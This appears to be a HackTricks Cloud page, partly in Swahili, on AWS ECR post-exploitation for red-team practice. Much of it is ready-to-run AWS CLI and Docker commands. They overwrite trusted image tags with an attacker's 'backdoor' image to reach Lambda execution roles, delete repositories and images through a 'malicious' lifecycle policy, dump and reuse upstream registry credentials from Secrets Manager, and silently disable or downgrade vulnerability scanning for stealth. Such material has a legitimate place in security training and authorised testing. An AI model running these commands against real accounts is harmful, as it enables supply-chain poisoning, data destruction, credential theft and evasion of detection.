HackTricks CloudAWS - ECR Post Exploitation
Tip
Jifunze na ufanye mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na ufanye mazoezi ya GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na ufanye mazoezi ya Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
Saidia HackTricks
- Angalia the subscription plans!
- Jiunge na 💬 Discord group au the telegram group au utufuate kwenye Twitter 🐦 @hacktricks_live.
- Shiriki hacking tricks kwa kutuma PRs kwa HackTricks and HackTricks Cloud github repos.
ECR
Kwa maelezo zaidi angalia
Login, Pull & Push
# Docker login into ecr
## For public repo (always use us-east-1)
aws ecr-public get-login-password --region us-east-1 | docker login --username AWS --password-stdin public.ecr.aws/<random-id>
## For private repo
aws ecr get-login-password --profile <profile_name> --region <region> | docker login --username AWS --password-stdin <account_id>.dkr.ecr.<region>.amazonaws.com
## If you need to acces an image from a repo if a different account, in <account_id> set the account number of the other account
# Download
docker pull <account_id>.dkr.ecr.<region>.amazonaws.com/<repo_name>:latest
## If you still have the error "Requested image not found"
## It might be because the tag "latest" doesn't exit
## Get valid tags with:
TOKEN=$(aws --profile <profile> ecr get-authorization-token --output text --query 'authorizationData[].authorizationToken')
curl -i -H "Authorization: Basic $TOKEN" https://<account_id>.dkr.ecr.<region>.amazonaws.com/v2/<img_name>/tags/list
# Inspect the image
docker inspect sha256:079aee8a89950717cdccd15b8f17c80e9bc4421a855fcdc120e1c534e4c102e0
docker inspect <account id>.dkr.ecr.<region>.amazonaws.com/<image>:<tag> # Inspect the image indicating the URL
# Upload (example uploading purplepanda with tag latest)
docker tag purplepanda:latest <account_id>.dkr.ecr.<region>.amazonaws.com/purplepanda:latest
docker push <account_id>.dkr.ecr.<region>.amazonaws.com/purplepanda:latest
# Downloading without Docker
# List digests
aws ecr batch-get-image --repository-name level2 \
--registry-id 653711331788 \
--image-ids imageTag=latest | jq '.images[].imageManifest | fromjson'
## Download a digest
aws ecr get-download-url-for-layer \
--repository-name level2 \
--registry-id 653711331788 \
--layer-digest "sha256:edfaad38ac10904ee76c81e343abf88f22e6cfc7413ab5a8e4aeffc6a7d9087a"
Baada ya kupakua images unapaswa kuangalia kama zina taarifa nyeti:
Kuandika Upya Tag Imeaminika kwa kutumia ecr:PutImage (Tag Hijacking / Supply Chain)
Ikiwa watumiaji wana-deploy kwa tag (kwa mfano stable, prod, latest) na tag zinaweza kubadilishwa, ecr:PutImage inaweza kutumika kuelekeza tena tag ya kuaminika kwa maudhui yanayodhibitiwa na mshambuliaji kwa kupakia image manifest chini ya tag hiyo.
Njia moja ya kawaida ni kunakili manifest ya tag iliyopo inayodhibitiwa na mshambuliaji (au digest) na kuandika upya tag ya kuaminika nayo.
REGION=us-east-1
REPO="<repo_name>"
SRC_TAG="backdoor" # attacker-controlled tag already present in the repository
DST_TAG="stable" # trusted tag used by downstream systems
# 1) Fetch the manifest behind the attacker tag
MANIFEST="$(aws ecr batch-get-image \
--region "$REGION" \
--repository-name "$REPO" \
--image-ids imageTag="$SRC_TAG" \
--query 'images[0].imageManifest' \
--output text)"
# 2) Overwrite the trusted tag with that manifest
aws ecr put-image \
--region "$REGION" \
--repository-name "$REPO" \
--image-tag "$DST_TAG" \
--image-manifest "$MANIFEST"
# 3) Verify both tags now point to the same digest
aws ecr describe-images --region "$REGION" --repository-name "$REPO" --image-ids imageTag="$DST_TAG" --query 'imageDetails[0].imageDigest' --output text
aws ecr describe-images --region "$REGION" --repository-name "$REPO" --image-ids imageTag="$SRC_TAG" --query 'imageDetails[0].imageDigest' --output text
Impact: workload yoyote inayovuta .../$REPO:$DST_TAG itapokea yaliyomo yaliyoteuliwa na mshambuliaji bila mabadiliko yoyote kwa IaC, Kubernetes manifests, au task definitions.
Mfano wa Mtumiaji wa Downstream: Lambda Container Images Zinajirefresh Kiotomatiki Wakati Tag Inasasishwa
Ikiwa Lambda function imewekwa kama container image (PackageType=Image) na inatumia ECR tag (e.g., :stable, :prod) badala ya digest, kuandika upya tag hiyo kunaweza kugeuza supply-chain tampering kuwa code execution inside the Lambda execution role mara tu function inapopata refresh.
Jinsi ya kuorodhesha hali hii:
REGION=us-east-1
# 1) Find image-based Lambda functions and their ImageUri
aws lambda list-functions --region "$REGION" \
--query "Functions[?PackageType=='Image'].[FunctionName]" --output text |
tr '\t' '\n' | while read -r fn; do
img="$(aws lambda get-function --region "$REGION" --function-name "$fn" --query 'Code.ImageUri' --output text 2>/dev/null || true)"
[ -n "$img" ] && printf '%s\t%s\n' "$fn" "$img"
done
# 2) Check whether a function references a mutable tag (contains ":<tag>")
# Prefer digest pinning (contains "@sha256:") in well-hardened deployments.
Jinsi refresh inavyotokea mara kwa mara:
- CI/CD au GitOps hupiga mara kwa mara
lambda:UpdateFunctionCode(hata ikiwa naImageUriile ile) ili kulazimisha Lambda kutatua tag tena. - Automation inayotokana na matukio husikiliza matukio ya ECR image (push/tag updates) na inachochea Lambda/automation ya kusasisha.
Ikiwa unaweza kuandika juu ya trusted tag na kuna mekanismo ya refresh, invocation inayofuata ya function itaendesha attacker-controlled code, ambayo inaweza kusoma environment variables, kupata rasilimali za mtandao, na kuita AWS APIs kwa kutumia Lambda role (kwa mfano, secretsmanager:GetSecretValue).
ecr:PutLifecyclePolicy | ecr:DeleteRepository | ecr-public:DeleteRepository | ecr:BatchDeleteImage | ecr-public:BatchDeleteImage
Attacker mwenye moja ya ruhusa hizi anaweza kuunda au kubadilisha lifecycle policy ili kufuta all images katika repository na kisha kufuta entire ECR repository. Hii itasababisha upotevu wa all container images zilizohifadhiwa katika repository.
# Create a JSON file with the malicious lifecycle policy
echo '{
"rules": [
{
"rulePriority": 1,
"description": "Delete all images",
"selection": {
"tagStatus": "any",
"countType": "imageCountMoreThan",
"countNumber": 0
},
"action": {
"type": "expire"
}
}
]
}' > malicious_policy.json
# Apply the malicious lifecycle policy to the ECR repository
aws ecr put-lifecycle-policy --repository-name your-ecr-repo-name --lifecycle-policy-text file://malicious_policy.json
# Delete the ECR repository
aws ecr delete-repository --repository-name your-ecr-repo-name --force
# Delete the ECR public repository
aws ecr-public delete-repository --repository-name your-ecr-repo-name --force
# Delete multiple images from the ECR repository
aws ecr batch-delete-image --repository-name your-ecr-repo-name --image-ids imageTag=latest imageTag=v1.0.0
# Delete multiple images from the ECR public repository
aws ecr-public batch-delete-image --repository-name your-ecr-repo-name --image-ids imageTag=latest imageTag=v1.0.0
Exfiltrate nywila za rejista ya upstream kutoka ECR Pull‑Through Cache (PTC)
Ikiwa ECR Pull‑Through Cache imewekwa kwa rejista za upstream zinazothibitishwa (Docker Hub, GHCR, ACR, etc.), nywila za upstream huhifadhiwa katika AWS Secrets Manager zikiwa na kiambishi awali cha jina kinachoweza kutabiriwa: ecr-pullthroughcache/. Waendeshaji wakati mwingine huwapa ECR admins upatikanaji mpana wa kusoma Secrets Manager, kuruhusu credential exfiltration na matumizi tena nje ya AWS.
Requirements
- secretsmanager:ListSecrets
- secretsmanager:GetSecretValue
Orodhesha siri za PTC zinazowezekana
aws secretsmanager list-secrets \
--query "SecretList[?starts_with(Name, 'ecr-pullthroughcache/')].Name" \
--output text
Dump secrets zilizogunduliwa na parse fields za kawaida
for s in $(aws secretsmanager list-secrets \
--query "SecretList[?starts_with(Name, 'ecr-pullthroughcache/')].ARN" --output text); do
aws secretsmanager get-secret-value --secret-id "$s" \
--query SecretString --output text | tee /tmp/ptc_secret.json
jq -r '.username? // .user? // empty' /tmp/ptc_secret.json || true
jq -r '.password? // .token? // empty' /tmp/ptc_secret.json || true
done
Hiari: Thibitisha leaked creds dhidi ya upstream (read‑only login)
echo "$DOCKERHUB_PASSWORD" | docker login --username "$DOCKERHUB_USERNAME" --password-stdin registry-1.docker.io
Athari
- Kusoma haya maingizo ya Secrets Manager kunatoa reusable upstream registry credentials (username/password au token), ambazo zinaweza kutumika kwa ubaya nje ya AWS kuvuta private images au kupata repositories za ziada kulingana na upstream permissions.
Ujifichu wa ngazi ya registry: kuzima au kushusha ukaguzi kupitia ecr:PutRegistryScanningConfiguration
Mdukuzi aliye na permissions za ngazi ya registry za ECR anaweza kimya kimya kupunguza au kuzima ukaguzi wa moja kwa moja wa vulnerabilities kwa ALL repositories kwa kuweka registry scanning configuration kuwa BASIC bila sheria yoyote za scan-on-push. Hii inazuia pushes mpya za image zisichunguzwe kiotomatiki, ikificha vulnerable au malicious images.
Mahitaji
- ecr:PutRegistryScanningConfiguration
- ecr:GetRegistryScanningConfiguration
- ecr:PutImageScanningConfiguration (hiari, kwa kila repo)
- ecr:DescribeImages, ecr:DescribeImageScanFindings (verification)
Kushusha kwa kiwango cha registry hadi manual (hakuna ukaguzi otomatiki)
REGION=us-east-1
# Read current config (save to restore later)
aws ecr get-registry-scanning-configuration --region "$REGION"
# Set BASIC scanning with no rules (results in MANUAL scanning only)
aws ecr put-registry-scanning-configuration \
--region "$REGION" \
--scan-type BASIC \
--rules '[]'
Jaribu kwa kutumia repo na image
acct=$(aws sts get-caller-identity --query Account --output text)
repo=ht-scan-stealth
aws ecr create-repository --region "$REGION" --repository-name "$repo" >/dev/null 2>&1 || true
aws ecr get-login-password --region "$REGION" | docker login --username AWS --password-stdin ${acct}.dkr.ecr.${REGION}.amazonaws.com
printf 'FROM alpine:3.19\nRUN echo STEALTH > /etc/marker\n' > Dockerfile
docker build -t ${acct}.dkr.ecr.${REGION}.amazonaws.com/${repo}:test .
docker push ${acct}.dkr.ecr.${REGION}.amazonaws.com/${repo}:test
# Verify no scan ran automatically
aws ecr describe-images --region "$REGION" --repository-name "$repo" --image-ids imageTag=test --query 'imageDetails[0].imageScanStatus'
# Optional: will error with ScanNotFoundException if no scan exists
aws ecr describe-image-scan-findings --region "$REGION" --repository-name "$repo" --image-id imageTag=test || true
Hiari: punguza zaidi kwenye wigo wa repo
# Disable scan-on-push for a specific repository
aws ecr put-image-scanning-configuration \
--region "$REGION" \
--repository-name "$repo" \
--image-scanning-configuration scanOnPush=false
Athari
- Kuongeza image mpya kote kwenye registry hakuigwa/haifanyiwi ukaguzi kwa otomatiki, hivyo kupunguza uonekano wa maudhui yaliyo hatarishi au yenye nia mbaya na kuchelewesha kugunduliwa hadi ukaguzi wa mikono uanze.
Kupunguza injini ya ukaguzi ya registry nzima kupitia ecr:PutAccountSetting (AWS_NATIVE -> CLAIR)
Punguza ubora wa utambuzi wa udhaifu katika registry nzima kwa kubadilisha injini ya ukaguzi ya BASIC kutoka chaguo-msingi AWS_NATIVE hadi injini ya zamani CLAIR. Hii haiizimi ukaguzi, lakini inaweza kubadilisha kwa kiasi matokeo/ufunikaji. Changanya na usanidi wa ukaguzi wa registry wa BASIC usio na sheria yoyote ili kufanya ukaguzi ufanyike kwa mikono pekee.
Mahitaji
ecr:PutAccountSetting,ecr:GetAccountSetting- (Hiari)
ecr:PutRegistryScanningConfiguration,ecr:GetRegistryScanningConfiguration
Athari
- Mipangilio ya registry
BASIC_SCAN_TYPE_VERSIONimewekwa kuwaCLAIRhivyo ukaguzi wa BASIC unaofuata utatekelezwa kwa injini iliyopunguzwa. CloudTrail inarekodi API call yaPutAccountSetting.
Hatua
REGION=us-east-1
# 1) Read current value so you can restore it later
aws ecr get-account-setting --region $REGION --name BASIC_SCAN_TYPE_VERSION || true
# 2) Downgrade BASIC scan engine registry‑wide to CLAIR
aws ecr put-account-setting --region $REGION --name BASIC_SCAN_TYPE_VERSION --value CLAIR
# 3) Verify the setting
aws ecr get-account-setting --region $REGION --name BASIC_SCAN_TYPE_VERSION
# 4) (Optional stealth) switch registry scanning to BASIC with no rules (manual‑only scans)
aws ecr put-registry-scanning-configuration --region $REGION --scan-type BASIC --rules '[]' || true
# 5) Restore to AWS_NATIVE when finished to avoid side effects
aws ecr put-account-setting --region $REGION --name BASIC_SCAN_TYPE_VERSION --value AWS_NATIVE
Skanisha picha za ECR kwa udhaifu
#!/bin/bash
# This script pulls all images from ECR and runs snyk on them showing vulnerabilities for all images
region=<region>
profile=<aws_profile>
registryId=$(aws ecr describe-registry --region $region --profile $profile --output json | jq -r '.registryId')
# Configure docker creds
aws ecr get-login-password --region $region --profile $profile | docker login --username AWS --password-stdin $registryId.dkr.ecr.$region.amazonaws.com
while read -r repo; do
echo "Working on repository $repo"
digest=$(aws ecr describe-images --repository-name $repo --image-ids imageTag=latest --region $region --profile $profile --output json | jq -r '.imageDetails[] | .imageDigest')
if [ -z "$digest" ]
then
echo "No images! Empty repository"
continue
fi
url=$registryId.dkr.ecr.$region.amazonaws.com/$repo@$digest
echo "Pulling $url"
docker pull $url
echo "Scanning $url"
snyk container test $url --json-file-output=./snyk/$repo.json --severity-threshold=high
# trivy image -f json -o ./trivy/$repo.json --severity HIGH,CRITICAL $url
# echo "Removing image $url"
# docker image rm $url
done < <(aws ecr describe-repositories --region $region --profile $profile --output json | jq -r '.repositories[] | .repositoryName')
Tip
Jifunze na ufanye mazoezi ya AWS Hacking:
Jifunze na ufanye mazoezi ya GCP Hacking:
Jifunze na ufanye mazoezi ya Az Hacking:Saidia HackTricks
- Angalia the subscription plans!
- Jiunge na 💬 Discord group au the telegram group au utufuate kwenye Twitter 🐦 @hacktricks_live.
- Shiriki hacking tricks kwa kutuma PRs kwa HackTricks and HackTricks Cloud github repos.